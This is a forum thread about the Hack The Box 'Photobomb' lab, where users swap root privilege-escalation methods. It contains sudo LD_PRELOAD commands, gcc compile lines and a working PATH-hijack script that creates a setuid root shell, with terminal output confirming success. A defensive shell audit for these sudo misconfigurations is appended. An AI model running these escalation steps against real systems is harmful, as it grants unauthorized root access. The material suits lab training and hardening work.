Photobomb - HTB [Discussion]
(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh


How did you get to know about the LD_PRELOAD exploit?
Reply
(October 8, 2022, 09:10 PM)Giovanni0 Wrote:
(October 8, 2022, 09:04 PM)achillescarter Wrote:
(October 8, 2022, 09:02 PM)yumi Wrote: Linux Privilege Escalation using LD_Preload - Hacking Articles

@araaraara


when I try to use the sudo it's asking for the password


Save you shell.so in /tmp, then:

sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh


wizard@photobomb:/tmp$  sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh
sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh
ERROR: ld.so: object '/tmp/shell.so' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
ERROR: ld.so: object '/tmp/shell.so' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
ERROR: ld.so: object '/tmp/shell.so' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
Reply
(October 8, 2022, 09:11 PM)pandu Wrote:
(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh


How did you get to know about the LD_PRELOAD exploit?

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH
Reply
(October 8, 2022, 09:19 PM)SirKonafa Wrote:
(October 8, 2022, 09:11 PM)pandu Wrote:
(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh


How did you get to know about the LD_PRELOAD exploit?

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH


The problem with this is that I can't run "gcc":

wizard@photobomb:/tmp$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Command 'gcc' not found, but can be installed with:
Reply
(October 8, 2022, 09:22 PM)achillescarter Wrote:
(October 8, 2022, 09:19 PM)SirKonafa Wrote:
(October 8, 2022, 09:11 PM)pandu Wrote:
(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh


How did you get to know about the LD_PRELOAD exploit?

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH


The problem with this is that I can't run "gcc":

wizard@photobomb:/tmp$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Command 'gcc' not found, but can be installed with:


Compile it locally on your own machine then transfer it to the target machine.
Reply
BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd, find, chown with relative paths. So, you can also go the path hijacking route too.

Reply
(October 8, 2022, 09:19 PM)SirKonafa Wrote:
(October 8, 2022, 09:11 PM)pandu Wrote:
(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh


How did you get to know about the LD_PRELOAD exploit?

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH

sudo -l doesn't give any information about LD_LIBRARY_PATH. Also, that hacking article mentioned that if you run sudo -l and you see output like: env_keep += LD_PRELOAD
then you could gain root via this method!
Reply
(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd, find, chown with relative paths. So, you can also go the path hijacking route too.


No, the root user has its own .bashrc in the /opt folder!
Reply
(October 8, 2022, 09:37 PM)testbypsy Wrote:
(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd, find, chown with relative paths. So, you can also go the path hijacking route too.


No, the root user has its own .bashrc in the /opt folder!


wizard@photobomb:~$ cat find
#!/bin/bash
cp /bin/bash /tmp/asd; chmod 4777 /tmp/asd
wizard@photobomb:~$ chmod 777 find
wizard@photobomb:~$ sudo PATH=/home/wizard:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin /opt/cleanup.sh
wizard@photobomb:~$ ls -la /tmp/asd
-rwsrwxrwx 1 root root 1183448 Oct  8 21:37 /tmp/asd

?

Reply
(October 8, 2022, 09:38 PM)11231123 Wrote:
(October 8, 2022, 09:37 PM)testbypsy Wrote:
(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd, find, chown with relative paths. So, you can also go the path hijacking route too.


No, the root user has its own .bashrc in the /opt folder!


wizard@photobomb:~$ cat find
#!/bin/bash
cp /bin/bash /tmp/asd; chmod 4777 /tmp/asd
wizard@photobomb:~$ chmod 777 find
wizard@photobomb:~$ sudo PATH=/home/wizard:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin /opt/cleanup.sh
wizard@photobomb:~$ ls -la /tmp/asd
-rwsrwxrwx 1 root root 1183448 Oct  8 21:37 /tmp/asd

?


You get asked for a password, kiddo!


(October 8, 2022, 09:38 PM)11231123 Wrote:
(October 8, 2022, 09:37 PM)testbypsy Wrote:
(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd, find, chown with relative paths. So, you can also go the path hijacking route too.


No, the root user has its own .bashrc in the /opt folder!


wizard@photobomb:~$ cat find
#!/bin/bash
cp /bin/bash /tmp/asd; chmod 4777 /tmp/asd
wizard@photobomb:~$ chmod 777 find
wizard@photobomb:~$ sudo PATH=/home/wizard:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin /opt/cleanup.sh
wizard@photobomb:~$ ls -la /tmp/asd
-rwsrwxrwx 1 root root 1183448 Oct  8 21:37 /tmp/asd

?


Oh dang, it works. My bad, I was also including the export command :)
Reply
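The two conditions this thread keeps circling, a sudo rule that lets LD_PRELOAD or arbitrary variables (SETENV) reach the root command, and a sudo target script that calls tools by bare name so PATH decides what runs, as a small defender-side audit. This is an added example, not code from the thread or from the box; the sudoers lines and the sample script are constructed, and the function names are my own.

```shell
# Constructed sudoers fragments (hypothetical, not taken from the box): one that
# lets LD_PRELOAD or arbitrary env vars reach a root command, one that does not.
RISKY_SUDOERS='Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
wizard ALL=(root) SETENV: NOPASSWD: /opt/cleanup.sh'
SAFE_SUDOERS='Defaults env_reset
wizard ALL=(root) NOPASSWD: /opt/cleanup.sh'

# Constructed stand-in for a cleanup-style script that calls tools by bare name.
SAMPLE_SCRIPT='#!/bin/bash
cd /srv/uploads
find . -type f -mmin +5 -print > /tmp/stale.txt
chown -R root:root /srv/uploads
/usr/bin/logger "cleanup done"'

# Print every sudoers line that lets the caller carry LD_PRELOAD/LD_LIBRARY_PATH
# through sudo: an env_keep for them, or SETENV, which permits VAR=value on the
# sudo command line (PATH included) even for variables env_reset would strip.
audit_sudoers() {
    printf '%s\n' "$1" | grep -E 'env_keep.*LD_(PRELOAD|LIBRARY_PATH)|SETENV' || true
}

# Print, sorted and unique, the first word of each script line that is not a
# comment, blank, assignment or absolute path: these names resolve through PATH.
bare_commands() {
    printf '%s\n' "$1" | sed 's/^[[:space:]]*//' \
        | grep -vE '^(#|$|[A-Za-z_][A-Za-z0-9_]*=|/)' \
        | awk '{print $1}' | sort -u
}

# Keep only names that resolve to an external binary on this host; shell
# builtins such as cd are not looked up via PATH, so a fake one is never run.
path_resolved() {
    for c in $1; do
        case "$(command -v "$c" 2>/dev/null || true)" in
            /*) printf '%s\n' "$c" ;;
        esac
    done
}

# Combined check: print the findings and return 1 when either condition holds.
# The fix is the usual one: drop SETENV/env_keep and use absolute paths.
check_sudo_script() {
    envhits=$(audit_sudoers "$1")
    cmds=$(path_resolved "$(bare_commands "$2")")
    [ -n "$envhits" ] && printf 'sudo lets env vars through:\n%s\n' "$envhits"
    [ -n "$cmds" ] && printf 'PATH-resolved commands in sudo target:\n%s\n' "$cmds"
    [ -z "$envhits$cmds" ]
}
```

Run it against the real inputs with `check_sudo_script "$(sudo -l 2>/dev/null)" "$(cat /opt/cleanup.sh)"` on a box you administer; the audit_sudoers pattern also matches the `env_keep` wording that `sudo -l` prints.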

